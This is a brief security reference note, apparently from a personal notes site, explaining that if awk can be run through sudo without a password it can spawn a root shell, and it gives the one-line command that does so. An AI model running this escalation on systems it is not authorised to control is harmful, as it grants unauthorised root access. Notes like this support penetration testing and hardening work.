Cardboard Iguana Security

awk

If awk can be run with NOPASSWD via sudo, then you can use the following to break out into a root shell:

sudo awk 'BEGIN {system("/bin/sh")}'
awk
Interactive graph
On this page
awk